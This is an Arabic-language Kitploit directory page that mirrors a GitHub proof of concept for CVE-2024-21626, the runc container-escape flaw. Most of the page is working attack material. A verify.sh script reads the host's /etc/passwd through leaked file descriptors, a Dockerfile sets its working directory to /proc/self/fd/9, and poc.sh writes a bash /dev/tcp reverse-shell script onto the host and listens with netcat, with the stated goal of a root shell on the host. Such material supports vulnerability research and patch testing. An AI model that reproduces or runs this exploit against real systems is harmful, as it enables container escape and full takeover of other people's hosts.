Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21626 — POC | Kitploit
أدوات/GitHubGitHub/kubernetesbachelor/cve-2024-21626
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالفريق الأحمرالهروب من الحاوية
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

POC

عرض المستودع
25منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21626

POC

المتطلبات

runc 1.1.0 <= 1.1.11

تثبيت البيئة القابلة للاستغلال

قم بنشر جهاز افتراضي بنظام Ubuntu 20.04 ونزّل Docker باتباع دليلهم

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

استبدل إصدار 'runc' المُصحح في Docker بنسخة قابلة للاستغلال

نزّل نسخة قابلة للاستغلال (runc 1.1.11 أو إصدار أقدم) من مستودع runc على GitHub: https://github.com/opencontainers/runc/releases
اختر runc.amd64 (مطلوب) runc_1111

تنفيذ الاستغلال

تشغيل السكربت 'verify.sh'

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

غيّر دليل العمل في Dockerfile إلى واصف الملف (fd) الصحيح الذي تم العثور عليه بتشغيل verify.sh

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

بناء حاوية

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

شغّل صورة الحاوية ونفّذ poc.sh داخل قشرة bash

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

تدخل الحاوية في وضع الاستماع

lytte

تم إنشاء سكربت جديد في جذر (root) على الجهاز المضيف باسم 'bash.copy' في الدليل /proc/self/cwd/../../../bin/

bash

بجعل السكربت قابلاً للتنفيذ وتشغيله...

root@kitploit:~
chmod +x bash.copy
./bash.copy

... ستحصل على قشرة عكسية (reverse shell) بصلاحيات الجذر على الجهاز المضيف

root

المصدر

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

تنزيل الأداة